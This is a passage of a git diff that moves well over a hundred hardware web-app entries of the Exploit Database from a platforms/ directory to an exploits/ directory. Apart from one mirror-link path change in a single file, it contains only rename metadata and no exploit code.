b/exploits/hardware/webapps/24442.txt similarity index 100% rename from platforms/hardware/webapps/24442.txt rename to exploits/hardware/webapps/24442.txt diff --git a/platforms/hardware/webapps/24443.txt b/exploits/hardware/webapps/24443.txt similarity index 100% rename from platforms/hardware/webapps/24443.txt rename to exploits/hardware/webapps/24443.txt diff --git a/platforms/hardware/webapps/24453.txt b/exploits/hardware/webapps/24453.txt similarity index 100% rename from platforms/hardware/webapps/24453.txt rename to exploits/hardware/webapps/24453.txt diff --git a/platforms/hardware/webapps/24464.txt b/exploits/hardware/webapps/24464.txt similarity index 100% rename from platforms/hardware/webapps/24464.txt rename to exploits/hardware/webapps/24464.txt diff --git a/platforms/hardware/webapps/24466.txt b/exploits/hardware/webapps/24466.txt similarity index 100% rename from platforms/hardware/webapps/24466.txt rename to exploits/hardware/webapps/24466.txt diff --git a/platforms/hardware/webapps/24475.txt b/exploits/hardware/webapps/24475.txt similarity index 100% rename from platforms/hardware/webapps/24475.txt rename to exploits/hardware/webapps/24475.txt diff --git a/platforms/hardware/webapps/24476.txt b/exploits/hardware/webapps/24476.txt similarity index 100% rename from platforms/hardware/webapps/24476.txt rename to exploits/hardware/webapps/24476.txt diff --git a/platforms/hardware/webapps/24477.txt b/exploits/hardware/webapps/24477.txt similarity index 100% rename from platforms/hardware/webapps/24477.txt rename to exploits/hardware/webapps/24477.txt diff --git a/platforms/hardware/webapps/24478.txt b/exploits/hardware/webapps/24478.txt similarity index 100% rename from platforms/hardware/webapps/24478.txt rename to exploits/hardware/webapps/24478.txt diff --git a/platforms/hardware/webapps/24483.txt b/exploits/hardware/webapps/24483.txt similarity index 100% rename from platforms/hardware/webapps/24483.txt rename to exploits/hardware/webapps/24483.txt diff --git a/platforms/hardware/webapps/24484.txt b/exploits/hardware/webapps/24484.txt similarity index 100% rename from platforms/hardware/webapps/24484.txt rename to exploits/hardware/webapps/24484.txt diff --git a/platforms/hardware/webapps/24497.txt b/exploits/hardware/webapps/24497.txt similarity index 100% rename from platforms/hardware/webapps/24497.txt rename to exploits/hardware/webapps/24497.txt diff --git a/platforms/hardware/webapps/24498.txt b/exploits/hardware/webapps/24498.txt similarity index 100% rename from platforms/hardware/webapps/24498.txt rename to exploits/hardware/webapps/24498.txt diff --git a/platforms/hardware/webapps/24499.txt b/exploits/hardware/webapps/24499.txt similarity index 100% rename from platforms/hardware/webapps/24499.txt rename to exploits/hardware/webapps/24499.txt diff --git a/platforms/hardware/webapps/24503.txt b/exploits/hardware/webapps/24503.txt similarity index 100% rename from platforms/hardware/webapps/24503.txt rename to exploits/hardware/webapps/24503.txt diff --git a/platforms/hardware/webapps/24504.txt b/exploits/hardware/webapps/24504.txt similarity index 100% rename from platforms/hardware/webapps/24504.txt rename to exploits/hardware/webapps/24504.txt diff --git a/platforms/hardware/webapps/24513.txt b/exploits/hardware/webapps/24513.txt similarity index 100% rename from platforms/hardware/webapps/24513.txt rename to exploits/hardware/webapps/24513.txt diff --git a/platforms/hardware/webapps/24517.txt b/exploits/hardware/webapps/24517.txt similarity index 100% rename from platforms/hardware/webapps/24517.txt rename to exploits/hardware/webapps/24517.txt diff --git a/platforms/hardware/webapps/24550.txt b/exploits/hardware/webapps/24550.txt similarity index 100% rename from platforms/hardware/webapps/24550.txt rename to exploits/hardware/webapps/24550.txt diff --git a/platforms/hardware/webapps/24563.txt b/exploits/hardware/webapps/24563.txt similarity index 100% rename from platforms/hardware/webapps/24563.txt rename to exploits/hardware/webapps/24563.txt diff --git a/platforms/hardware/webapps/24740.txt b/exploits/hardware/webapps/24740.txt similarity index 100% rename from platforms/hardware/webapps/24740.txt rename to exploits/hardware/webapps/24740.txt diff --git a/platforms/hardware/webapps/24860.txt b/exploits/hardware/webapps/24860.txt similarity index 100% rename from platforms/hardware/webapps/24860.txt rename to exploits/hardware/webapps/24860.txt diff --git a/platforms/hardware/webapps/24864.pl b/exploits/hardware/webapps/24864.pl similarity index 100% rename from platforms/hardware/webapps/24864.pl rename to exploits/hardware/webapps/24864.pl diff --git a/platforms/hardware/webapps/24916.txt b/exploits/hardware/webapps/24916.txt similarity index 100% rename from platforms/hardware/webapps/24916.txt rename to exploits/hardware/webapps/24916.txt diff --git a/platforms/hardware/webapps/24924.txt b/exploits/hardware/webapps/24924.txt similarity index 100% rename from platforms/hardware/webapps/24924.txt rename to exploits/hardware/webapps/24924.txt diff --git a/platforms/hardware/webapps/24926.txt b/exploits/hardware/webapps/24926.txt similarity index 100% rename from platforms/hardware/webapps/24926.txt rename to exploits/hardware/webapps/24926.txt diff --git a/platforms/hardware/webapps/24928.txt b/exploits/hardware/webapps/24928.txt similarity index 100% rename from platforms/hardware/webapps/24928.txt rename to exploits/hardware/webapps/24928.txt diff --git a/platforms/hardware/webapps/24975.txt b/exploits/hardware/webapps/24975.txt similarity index 100% rename from platforms/hardware/webapps/24975.txt rename to exploits/hardware/webapps/24975.txt diff --git a/platforms/hardware/webapps/25024.txt b/exploits/hardware/webapps/25024.txt similarity index 100% rename from platforms/hardware/webapps/25024.txt rename to exploits/hardware/webapps/25024.txt diff --git a/platforms/hardware/webapps/25138.txt b/exploits/hardware/webapps/25138.txt similarity index 100% rename from platforms/hardware/webapps/25138.txt rename to exploits/hardware/webapps/25138.txt diff --git a/platforms/hardware/webapps/25139.txt b/exploits/hardware/webapps/25139.txt similarity index 100% rename from platforms/hardware/webapps/25139.txt rename to exploits/hardware/webapps/25139.txt diff --git a/platforms/hardware/webapps/25142.txt b/exploits/hardware/webapps/25142.txt similarity index 100% rename from platforms/hardware/webapps/25142.txt rename to exploits/hardware/webapps/25142.txt diff --git a/platforms/hardware/webapps/25251.txt b/exploits/hardware/webapps/25251.txt similarity index 100% rename from platforms/hardware/webapps/25251.txt rename to exploits/hardware/webapps/25251.txt diff --git a/platforms/hardware/webapps/25292.txt b/exploits/hardware/webapps/25292.txt similarity index 100% rename from platforms/hardware/webapps/25292.txt rename to exploits/hardware/webapps/25292.txt diff --git a/platforms/hardware/webapps/25413.txt b/exploits/hardware/webapps/25413.txt similarity index 100% rename from platforms/hardware/webapps/25413.txt rename to exploits/hardware/webapps/25413.txt diff --git a/platforms/hardware/webapps/25416.txt b/exploits/hardware/webapps/25416.txt similarity index 100% rename from platforms/hardware/webapps/25416.txt rename to exploits/hardware/webapps/25416.txt diff --git a/platforms/hardware/webapps/25715.py b/exploits/hardware/webapps/25715.py similarity index 100% rename from platforms/hardware/webapps/25715.py rename to exploits/hardware/webapps/25715.py diff --git a/platforms/hardware/webapps/25810.py b/exploits/hardware/webapps/25810.py similarity index 100% rename from platforms/hardware/webapps/25810.py rename to exploits/hardware/webapps/25810.py diff --git a/platforms/hardware/webapps/25811.py b/exploits/hardware/webapps/25811.py similarity index 100% rename from platforms/hardware/webapps/25811.py rename to exploits/hardware/webapps/25811.py diff --git a/platforms/hardware/webapps/25812.txt b/exploits/hardware/webapps/25812.txt similarity index 100% rename from platforms/hardware/webapps/25812.txt rename to exploits/hardware/webapps/25812.txt diff --git a/platforms/hardware/webapps/25813.txt b/exploits/hardware/webapps/25813.txt similarity index 100% rename from platforms/hardware/webapps/25813.txt rename to exploits/hardware/webapps/25813.txt diff --git a/platforms/hardware/webapps/25815.txt b/exploits/hardware/webapps/25815.txt similarity index 100% rename from platforms/hardware/webapps/25815.txt rename to exploits/hardware/webapps/25815.txt diff --git a/platforms/hardware/webapps/25968.pl b/exploits/hardware/webapps/25968.pl similarity index 100% rename from platforms/hardware/webapps/25968.pl rename to exploits/hardware/webapps/25968.pl diff --git a/platforms/hardware/webapps/25969.txt b/exploits/hardware/webapps/25969.txt similarity index 100% rename from platforms/hardware/webapps/25969.txt rename to exploits/hardware/webapps/25969.txt diff --git a/platforms/hardware/webapps/25976.txt b/exploits/hardware/webapps/25976.txt similarity index 100% rename from platforms/hardware/webapps/25976.txt rename to exploits/hardware/webapps/25976.txt diff --git a/platforms/hardware/webapps/25978.txt b/exploits/hardware/webapps/25978.txt similarity index 100% rename from platforms/hardware/webapps/25978.txt rename to exploits/hardware/webapps/25978.txt diff --git a/platforms/hardware/webapps/25998.txt b/exploits/hardware/webapps/25998.txt similarity index 100% rename from platforms/hardware/webapps/25998.txt rename to exploits/hardware/webapps/25998.txt diff --git a/platforms/hardware/webapps/26129.txt b/exploits/hardware/webapps/26129.txt similarity index 100% rename from platforms/hardware/webapps/26129.txt rename to exploits/hardware/webapps/26129.txt diff --git a/platforms/hardware/webapps/26174.txt b/exploits/hardware/webapps/26174.txt similarity index 100% rename from platforms/hardware/webapps/26174.txt rename to exploits/hardware/webapps/26174.txt diff --git a/platforms/hardware/webapps/26401.txt b/exploits/hardware/webapps/26401.txt similarity index 100% rename from platforms/hardware/webapps/26401.txt rename to exploits/hardware/webapps/26401.txt diff --git a/platforms/hardware/webapps/26415.txt b/exploits/hardware/webapps/26415.txt similarity index 100% rename from platforms/hardware/webapps/26415.txt rename to exploits/hardware/webapps/26415.txt diff --git a/platforms/hardware/webapps/26496.txt b/exploits/hardware/webapps/26496.txt similarity index 100% rename from platforms/hardware/webapps/26496.txt rename to exploits/hardware/webapps/26496.txt diff --git a/platforms/hardware/webapps/26527.txt b/exploits/hardware/webapps/26527.txt similarity index 100% rename from platforms/hardware/webapps/26527.txt rename to exploits/hardware/webapps/26527.txt diff --git a/platforms/hardware/webapps/26528.txt b/exploits/hardware/webapps/26528.txt similarity index 100% rename from platforms/hardware/webapps/26528.txt rename to exploits/hardware/webapps/26528.txt diff --git a/platforms/hardware/webapps/26664.txt b/exploits/hardware/webapps/26664.txt similarity index 100% rename from platforms/hardware/webapps/26664.txt rename to exploits/hardware/webapps/26664.txt diff --git a/platforms/hardware/webapps/26736.txt b/exploits/hardware/webapps/26736.txt similarity index 100% rename from platforms/hardware/webapps/26736.txt rename to exploits/hardware/webapps/26736.txt diff --git a/platforms/hardware/webapps/27005.txt b/exploits/hardware/webapps/27005.txt similarity index 100% rename from platforms/hardware/webapps/27005.txt rename to exploits/hardware/webapps/27005.txt diff --git a/platforms/hardware/webapps/27006.txt b/exploits/hardware/webapps/27006.txt similarity index 100% rename from platforms/hardware/webapps/27006.txt rename to exploits/hardware/webapps/27006.txt diff --git a/platforms/hardware/webapps/27076.txt b/exploits/hardware/webapps/27076.txt similarity index 100% rename from platforms/hardware/webapps/27076.txt rename to exploits/hardware/webapps/27076.txt diff --git a/platforms/hardware/webapps/27134.pl b/exploits/hardware/webapps/27134.pl similarity index 100% rename from platforms/hardware/webapps/27134.pl rename to exploits/hardware/webapps/27134.pl diff --git a/platforms/hardware/webapps/27177.html b/exploits/hardware/webapps/27177.html similarity index 100% rename from platforms/hardware/webapps/27177.html rename to exploits/hardware/webapps/27177.html diff --git a/platforms/hardware/webapps/27283.txt b/exploits/hardware/webapps/27283.txt similarity index 100% rename from platforms/hardware/webapps/27283.txt rename to exploits/hardware/webapps/27283.txt diff --git a/platforms/hardware/webapps/27284.txt b/exploits/hardware/webapps/27284.txt similarity index 100% rename from platforms/hardware/webapps/27284.txt rename to exploits/hardware/webapps/27284.txt diff --git a/platforms/hardware/webapps/27286.txt b/exploits/hardware/webapps/27286.txt similarity index 100% rename from platforms/hardware/webapps/27286.txt rename to exploits/hardware/webapps/27286.txt diff --git a/platforms/hardware/webapps/27288.txt b/exploits/hardware/webapps/27288.txt similarity index 100% rename from platforms/hardware/webapps/27288.txt rename to exploits/hardware/webapps/27288.txt diff --git a/platforms/hardware/webapps/27289.txt b/exploits/hardware/webapps/27289.txt similarity index 100% rename from platforms/hardware/webapps/27289.txt rename to exploits/hardware/webapps/27289.txt diff --git a/platforms/hardware/webapps/27320.txt b/exploits/hardware/webapps/27320.txt similarity index 100% rename from platforms/hardware/webapps/27320.txt rename to exploits/hardware/webapps/27320.txt diff --git a/platforms/hardware/webapps/27402.txt b/exploits/hardware/webapps/27402.txt similarity index 100% rename from platforms/hardware/webapps/27402.txt rename to exploits/hardware/webapps/27402.txt diff --git a/platforms/hardware/webapps/27753.txt b/exploits/hardware/webapps/27753.txt similarity index 100% rename from platforms/hardware/webapps/27753.txt rename to exploits/hardware/webapps/27753.txt diff --git a/platforms/hardware/webapps/27756.txt b/exploits/hardware/webapps/27756.txt similarity index 100% rename from platforms/hardware/webapps/27756.txt rename to exploits/hardware/webapps/27756.txt diff --git a/platforms/hardware/webapps/27774.py b/exploits/hardware/webapps/27774.py similarity index 100% rename from platforms/hardware/webapps/27774.py rename to exploits/hardware/webapps/27774.py diff --git a/platforms/hardware/webapps/27878.txt b/exploits/hardware/webapps/27878.txt similarity index 100% rename from platforms/hardware/webapps/27878.txt rename to exploits/hardware/webapps/27878.txt diff --git a/platforms/hardware/webapps/28053.txt b/exploits/hardware/webapps/28053.txt similarity index 100% rename from platforms/hardware/webapps/28053.txt rename to exploits/hardware/webapps/28053.txt diff --git a/platforms/hardware/webapps/28055.txt b/exploits/hardware/webapps/28055.txt similarity index 100% rename from platforms/hardware/webapps/28055.txt rename to exploits/hardware/webapps/28055.txt diff --git a/platforms/hardware/webapps/28184.txt b/exploits/hardware/webapps/28184.txt similarity index 100% rename from platforms/hardware/webapps/28184.txt rename to exploits/hardware/webapps/28184.txt diff --git a/platforms/hardware/webapps/28239.txt b/exploits/hardware/webapps/28239.txt similarity index 100% rename from platforms/hardware/webapps/28239.txt rename to exploits/hardware/webapps/28239.txt diff --git a/platforms/hardware/webapps/28279.txt b/exploits/hardware/webapps/28279.txt similarity index 100% rename from platforms/hardware/webapps/28279.txt rename to exploits/hardware/webapps/28279.txt diff --git a/platforms/hardware/webapps/28283.txt b/exploits/hardware/webapps/28283.txt similarity index 100% rename from platforms/hardware/webapps/28283.txt rename to exploits/hardware/webapps/28283.txt diff --git a/platforms/hardware/webapps/28555.txt b/exploits/hardware/webapps/28555.txt similarity index 100% rename from platforms/hardware/webapps/28555.txt rename to exploits/hardware/webapps/28555.txt diff --git a/platforms/hardware/webapps/28562.txt b/exploits/hardware/webapps/28562.txt similarity index 100% rename from platforms/hardware/webapps/28562.txt rename to exploits/hardware/webapps/28562.txt diff --git a/platforms/hardware/webapps/28649.txt b/exploits/hardware/webapps/28649.txt similarity index 100% rename from platforms/hardware/webapps/28649.txt rename to exploits/hardware/webapps/28649.txt diff --git a/platforms/hardware/webapps/28652.txt b/exploits/hardware/webapps/28652.txt similarity index 100% rename from platforms/hardware/webapps/28652.txt rename to exploits/hardware/webapps/28652.txt diff --git a/platforms/hardware/webapps/29131.rb b/exploits/hardware/webapps/29131.rb similarity index 100% rename from platforms/hardware/webapps/29131.rb rename to exploits/hardware/webapps/29131.rb diff --git a/platforms/hardware/webapps/29262.pl b/exploits/hardware/webapps/29262.pl similarity index 100% rename from platforms/hardware/webapps/29262.pl rename to exploits/hardware/webapps/29262.pl diff --git a/platforms/hardware/webapps/29266.txt b/exploits/hardware/webapps/29266.txt similarity index 100% rename from platforms/hardware/webapps/29266.txt rename to exploits/hardware/webapps/29266.txt diff --git a/platforms/hardware/webapps/29312.txt b/exploits/hardware/webapps/29312.txt similarity index 100% rename from platforms/hardware/webapps/29312.txt rename to exploits/hardware/webapps/29312.txt diff --git a/platforms/hardware/webapps/29516.txt b/exploits/hardware/webapps/29516.txt similarity index 100% rename from platforms/hardware/webapps/29516.txt rename to exploits/hardware/webapps/29516.txt diff --git a/platforms/hardware/webapps/29518.txt b/exploits/hardware/webapps/29518.txt similarity index 100% rename from platforms/hardware/webapps/29518.txt rename to exploits/hardware/webapps/29518.txt diff --git a/platforms/hardware/webapps/29570.txt b/exploits/hardware/webapps/29570.txt similarity index 100% rename from platforms/hardware/webapps/29570.txt rename to exploits/hardware/webapps/29570.txt diff --git a/platforms/hardware/webapps/29612.txt b/exploits/hardware/webapps/29612.txt similarity index 100% rename from platforms/hardware/webapps/29612.txt rename to exploits/hardware/webapps/29612.txt diff --git a/platforms/hardware/webapps/29673.txt b/exploits/hardware/webapps/29673.txt similarity index 100% rename from platforms/hardware/webapps/29673.txt rename to exploits/hardware/webapps/29673.txt diff --git a/platforms/hardware/webapps/29709.txt b/exploits/hardware/webapps/29709.txt similarity index 100% rename from platforms/hardware/webapps/29709.txt rename to exploits/hardware/webapps/29709.txt diff --git a/platforms/hardware/webapps/29794.txt b/exploits/hardware/webapps/29794.txt similarity index 100% rename from platforms/hardware/webapps/29794.txt rename to exploits/hardware/webapps/29794.txt diff --git a/platforms/hardware/webapps/29795.pl b/exploits/hardware/webapps/29795.pl similarity index 100% rename from platforms/hardware/webapps/29795.pl rename to exploits/hardware/webapps/29795.pl diff --git a/platforms/hardware/webapps/29796.pl b/exploits/hardware/webapps/29796.pl similarity index 100% rename from platforms/hardware/webapps/29796.pl rename to exploits/hardware/webapps/29796.pl diff --git a/platforms/hardware/webapps/29802.txt b/exploits/hardware/webapps/29802.txt similarity index 100% rename from platforms/hardware/webapps/29802.txt rename to exploits/hardware/webapps/29802.txt diff --git a/platforms/hardware/webapps/29924.txt b/exploits/hardware/webapps/29924.txt similarity index 100% rename from platforms/hardware/webapps/29924.txt rename to exploits/hardware/webapps/29924.txt diff --git a/platforms/hardware/webapps/29927.txt b/exploits/hardware/webapps/29927.txt similarity index 100% rename from platforms/hardware/webapps/29927.txt rename to exploits/hardware/webapps/29927.txt diff --git a/platforms/hardware/webapps/29959.txt b/exploits/hardware/webapps/29959.txt similarity index 91% rename from platforms/hardware/webapps/29959.txt rename to exploits/hardware/webapps/29959.txt index 471551bc8..92be8715b 100644 --- a/platforms/hardware/webapps/29959.txt +++ b/exploits/hardware/webapps/29959.txt @@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com Root-Node -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29959.nse \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29959.nse \ No newline at end of file diff --git a/platforms/hardware/webapps/30062.py b/exploits/hardware/webapps/30062.py similarity index 100% rename from platforms/hardware/webapps/30062.py rename to exploits/hardware/webapps/30062.py diff --git a/platforms/hardware/webapps/30248.txt b/exploits/hardware/webapps/30248.txt similarity index 100% rename from platforms/hardware/webapps/30248.txt rename to exploits/hardware/webapps/30248.txt diff --git a/platforms/hardware/webapps/30358.txt b/exploits/hardware/webapps/30358.txt similarity index 100% rename from platforms/hardware/webapps/30358.txt rename to exploits/hardware/webapps/30358.txt diff --git a/platforms/hardware/webapps/30361.txt b/exploits/hardware/webapps/30361.txt similarity index 100% rename from platforms/hardware/webapps/30361.txt rename to exploits/hardware/webapps/30361.txt diff --git a/platforms/hardware/webapps/30362.txt b/exploits/hardware/webapps/30362.txt similarity index 100% rename from platforms/hardware/webapps/30362.txt rename to exploits/hardware/webapps/30362.txt diff --git a/platforms/hardware/webapps/30415.txt b/exploits/hardware/webapps/30415.txt similarity index 100% rename from platforms/hardware/webapps/30415.txt rename to exploits/hardware/webapps/30415.txt diff --git a/platforms/hardware/webapps/30547.txt b/exploits/hardware/webapps/30547.txt similarity index 100% rename from platforms/hardware/webapps/30547.txt rename to exploits/hardware/webapps/30547.txt diff --git a/platforms/hardware/webapps/30665.txt b/exploits/hardware/webapps/30665.txt similarity index 100% rename from platforms/hardware/webapps/30665.txt rename to exploits/hardware/webapps/30665.txt diff --git a/platforms/hardware/webapps/30667.txt b/exploits/hardware/webapps/30667.txt similarity index 100% rename from platforms/hardware/webapps/30667.txt rename to exploits/hardware/webapps/30667.txt diff --git a/platforms/hardware/webapps/30668.txt b/exploits/hardware/webapps/30668.txt similarity index 100% rename from platforms/hardware/webapps/30668.txt rename to exploits/hardware/webapps/30668.txt diff --git a/platforms/hardware/webapps/30723.php b/exploits/hardware/webapps/30723.php similarity index 100% rename from platforms/hardware/webapps/30723.php rename to exploits/hardware/webapps/30723.php diff --git a/platforms/hardware/webapps/30725.txt b/exploits/hardware/webapps/30725.txt similarity index 100% rename from platforms/hardware/webapps/30725.txt rename to exploits/hardware/webapps/30725.txt diff --git a/platforms/hardware/webapps/30726.txt b/exploits/hardware/webapps/30726.txt similarity index 100% rename from platforms/hardware/webapps/30726.txt rename to exploits/hardware/webapps/30726.txt diff --git a/platforms/hardware/webapps/30727.txt b/exploits/hardware/webapps/30727.txt similarity index 100% rename from platforms/hardware/webapps/30727.txt rename to exploits/hardware/webapps/30727.txt diff --git a/platforms/hardware/webapps/30900.html b/exploits/hardware/webapps/30900.html similarity index 100% rename from platforms/hardware/webapps/30900.html rename to exploits/hardware/webapps/30900.html diff --git a/platforms/hardware/webapps/30914.txt b/exploits/hardware/webapps/30914.txt similarity index 100% rename from platforms/hardware/webapps/30914.txt rename to exploits/hardware/webapps/30914.txt diff --git a/platforms/hardware/webapps/31087.txt b/exploits/hardware/webapps/31087.txt similarity index 100% rename from platforms/hardware/webapps/31087.txt rename to exploits/hardware/webapps/31087.txt diff --git a/platforms/hardware/webapps/31088.py b/exploits/hardware/webapps/31088.py similarity index 100% rename from platforms/hardware/webapps/31088.py rename to exploits/hardware/webapps/31088.py diff --git a/platforms/hardware/webapps/31180.txt b/exploits/hardware/webapps/31180.txt similarity index 100% rename from platforms/hardware/webapps/31180.txt rename to exploits/hardware/webapps/31180.txt diff --git a/platforms/hardware/webapps/31261.txt b/exploits/hardware/webapps/31261.txt similarity index 100% rename from platforms/hardware/webapps/31261.txt rename to exploits/hardware/webapps/31261.txt diff --git a/platforms/hardware/webapps/31425.txt b/exploits/hardware/webapps/31425.txt similarity index 100% rename from platforms/hardware/webapps/31425.txt rename to exploits/hardware/webapps/31425.txt diff --git a/platforms/hardware/webapps/31430.txt b/exploits/hardware/webapps/31430.txt similarity index 100% rename from platforms/hardware/webapps/31430.txt rename to exploits/hardware/webapps/31430.txt diff --git a/platforms/hardware/webapps/31527.nse b/exploits/hardware/webapps/31527.nse similarity index 100% rename from platforms/hardware/webapps/31527.nse rename to exploits/hardware/webapps/31527.nse diff --git a/platforms/hardware/webapps/31569.txt b/exploits/hardware/webapps/31569.txt similarity index 100% rename from platforms/hardware/webapps/31569.txt rename to exploits/hardware/webapps/31569.txt diff --git a/platforms/hardware/webapps/31617.txt b/exploits/hardware/webapps/31617.txt similarity index 100% rename from platforms/hardware/webapps/31617.txt rename to exploits/hardware/webapps/31617.txt diff --git a/platforms/hardware/webapps/31690.txt b/exploits/hardware/webapps/31690.txt similarity index 100% rename from platforms/hardware/webapps/31690.txt rename to exploits/hardware/webapps/31690.txt diff --git a/platforms/hardware/webapps/31764.txt b/exploits/hardware/webapps/31764.txt similarity index 100% rename from platforms/hardware/webapps/31764.txt rename to exploits/hardware/webapps/31764.txt diff --git a/platforms/hardware/webapps/31765.txt b/exploits/hardware/webapps/31765.txt similarity index 100% rename from platforms/hardware/webapps/31765.txt rename to exploits/hardware/webapps/31765.txt diff --git a/platforms/hardware/webapps/31790.txt b/exploits/hardware/webapps/31790.txt similarity index 100% rename from platforms/hardware/webapps/31790.txt rename to exploits/hardware/webapps/31790.txt diff --git a/platforms/hardware/webapps/31894.txt b/exploits/hardware/webapps/31894.txt similarity index 100% rename from platforms/hardware/webapps/31894.txt rename to exploits/hardware/webapps/31894.txt diff --git a/platforms/hardware/webapps/31985.txt b/exploits/hardware/webapps/31985.txt similarity index 100% rename from platforms/hardware/webapps/31985.txt rename to exploits/hardware/webapps/31985.txt diff --git a/platforms/hardware/webapps/32161.txt b/exploits/hardware/webapps/32161.txt similarity index 100% rename from platforms/hardware/webapps/32161.txt rename to exploits/hardware/webapps/32161.txt diff --git a/platforms/hardware/webapps/32204.txt b/exploits/hardware/webapps/32204.txt similarity index 100% rename from platforms/hardware/webapps/32204.txt rename to exploits/hardware/webapps/32204.txt diff --git a/platforms/hardware/webapps/32237.txt b/exploits/hardware/webapps/32237.txt similarity index 100% rename from platforms/hardware/webapps/32237.txt rename to exploits/hardware/webapps/32237.txt diff --git a/platforms/hardware/webapps/32238.txt b/exploits/hardware/webapps/32238.txt similarity index 100% rename from platforms/hardware/webapps/32238.txt rename to exploits/hardware/webapps/32238.txt diff --git a/platforms/hardware/webapps/32369.txt b/exploits/hardware/webapps/32369.txt similarity index 100% rename from platforms/hardware/webapps/32369.txt rename to exploits/hardware/webapps/32369.txt diff --git a/platforms/hardware/webapps/32385.txt b/exploits/hardware/webapps/32385.txt similarity index 100% rename from platforms/hardware/webapps/32385.txt rename to exploits/hardware/webapps/32385.txt diff --git a/platforms/hardware/webapps/32545.txt b/exploits/hardware/webapps/32545.txt similarity index 100% rename from platforms/hardware/webapps/32545.txt rename to exploits/hardware/webapps/32545.txt diff --git a/platforms/hardware/webapps/32667.pdf b/exploits/hardware/webapps/32667.pdf similarity index 100% rename from platforms/hardware/webapps/32667.pdf rename to exploits/hardware/webapps/32667.pdf diff --git a/platforms/hardware/webapps/32859.txt b/exploits/hardware/webapps/32859.txt similarity index 100% rename from platforms/hardware/webapps/32859.txt rename to exploits/hardware/webapps/32859.txt diff --git a/platforms/hardware/webapps/32883.txt b/exploits/hardware/webapps/32883.txt similarity index 100% rename from platforms/hardware/webapps/32883.txt rename to exploits/hardware/webapps/32883.txt diff --git a/platforms/hardware/webapps/32886.txt b/exploits/hardware/webapps/32886.txt similarity index 100% rename from platforms/hardware/webapps/32886.txt rename to exploits/hardware/webapps/32886.txt diff --git a/platforms/hardware/webapps/32943.txt b/exploits/hardware/webapps/32943.txt similarity index 100% rename from platforms/hardware/webapps/32943.txt rename to exploits/hardware/webapps/32943.txt diff --git a/platforms/hardware/webapps/32973.txt b/exploits/hardware/webapps/32973.txt similarity index 100% rename from platforms/hardware/webapps/32973.txt rename to exploits/hardware/webapps/32973.txt diff --git a/platforms/hardware/webapps/32990.pl b/exploits/hardware/webapps/32990.pl similarity index 100% rename from platforms/hardware/webapps/32990.pl rename to exploits/hardware/webapps/32990.pl diff --git a/platforms/hardware/webapps/33090.txt b/exploits/hardware/webapps/33090.txt similarity index 100% rename from platforms/hardware/webapps/33090.txt rename to exploits/hardware/webapps/33090.txt diff --git a/platforms/hardware/webapps/33129.html b/exploits/hardware/webapps/33129.html similarity index 100% rename from platforms/hardware/webapps/33129.html rename to exploits/hardware/webapps/33129.html diff --git a/platforms/hardware/webapps/33136.txt b/exploits/hardware/webapps/33136.txt similarity index 100% rename from platforms/hardware/webapps/33136.txt rename to exploits/hardware/webapps/33136.txt diff --git a/platforms/hardware/webapps/33138.txt b/exploits/hardware/webapps/33138.txt similarity index 100% rename from platforms/hardware/webapps/33138.txt rename to exploits/hardware/webapps/33138.txt diff --git a/platforms/hardware/webapps/33159.txt b/exploits/hardware/webapps/33159.txt similarity index 100% rename from platforms/hardware/webapps/33159.txt rename to exploits/hardware/webapps/33159.txt diff --git a/platforms/hardware/webapps/33247.txt b/exploits/hardware/webapps/33247.txt similarity index 100% rename from platforms/hardware/webapps/33247.txt rename to exploits/hardware/webapps/33247.txt diff --git a/platforms/hardware/webapps/33248.txt b/exploits/hardware/webapps/33248.txt similarity index 100% rename from platforms/hardware/webapps/33248.txt rename to exploits/hardware/webapps/33248.txt diff --git a/platforms/hardware/webapps/33327.txt b/exploits/hardware/webapps/33327.txt similarity index 100% rename from platforms/hardware/webapps/33327.txt rename to exploits/hardware/webapps/33327.txt diff --git a/platforms/hardware/webapps/33353.txt b/exploits/hardware/webapps/33353.txt similarity index 100% rename from platforms/hardware/webapps/33353.txt rename to exploits/hardware/webapps/33353.txt diff --git a/platforms/hardware/webapps/33455.txt b/exploits/hardware/webapps/33455.txt similarity index 100% rename from platforms/hardware/webapps/33455.txt rename to exploits/hardware/webapps/33455.txt diff --git a/platforms/hardware/webapps/33518.txt b/exploits/hardware/webapps/33518.txt similarity index 100% rename from platforms/hardware/webapps/33518.txt rename to exploits/hardware/webapps/33518.txt diff --git a/platforms/hardware/webapps/33520.txt b/exploits/hardware/webapps/33520.txt similarity index 100% rename from platforms/hardware/webapps/33520.txt rename to exploits/hardware/webapps/33520.txt diff --git a/platforms/hardware/webapps/33740.txt b/exploits/hardware/webapps/33740.txt similarity index 100% rename from platforms/hardware/webapps/33740.txt rename to exploits/hardware/webapps/33740.txt diff --git a/platforms/hardware/webapps/33792.txt b/exploits/hardware/webapps/33792.txt similarity index 100% rename from platforms/hardware/webapps/33792.txt rename to exploits/hardware/webapps/33792.txt diff --git a/platforms/hardware/webapps/33803.txt b/exploits/hardware/webapps/33803.txt similarity index 100% rename from platforms/hardware/webapps/33803.txt rename to exploits/hardware/webapps/33803.txt diff --git a/platforms/hardware/webapps/33822.sh b/exploits/hardware/webapps/33822.sh similarity index 100% rename from platforms/hardware/webapps/33822.sh rename to exploits/hardware/webapps/33822.sh diff --git a/platforms/hardware/webapps/33866.html b/exploits/hardware/webapps/33866.html similarity index 100% rename from platforms/hardware/webapps/33866.html rename to exploits/hardware/webapps/33866.html diff --git a/platforms/hardware/webapps/33984.rb b/exploits/hardware/webapps/33984.rb similarity index 100% rename from platforms/hardware/webapps/33984.rb rename to exploits/hardware/webapps/33984.rb diff --git a/platforms/hardware/webapps/34128.py b/exploits/hardware/webapps/34128.py similarity index 100% rename from platforms/hardware/webapps/34128.py rename to exploits/hardware/webapps/34128.py diff --git a/platforms/hardware/webapps/34149.txt b/exploits/hardware/webapps/34149.txt similarity index 100% rename from platforms/hardware/webapps/34149.txt rename to exploits/hardware/webapps/34149.txt diff --git a/platforms/hardware/webapps/34163.txt b/exploits/hardware/webapps/34163.txt similarity index 100% rename from platforms/hardware/webapps/34163.txt rename to exploits/hardware/webapps/34163.txt diff --git a/platforms/hardware/webapps/34187.txt b/exploits/hardware/webapps/34187.txt similarity index 100% rename from platforms/hardware/webapps/34187.txt rename to exploits/hardware/webapps/34187.txt diff --git a/platforms/hardware/webapps/34206.txt b/exploits/hardware/webapps/34206.txt similarity index 100% rename from platforms/hardware/webapps/34206.txt 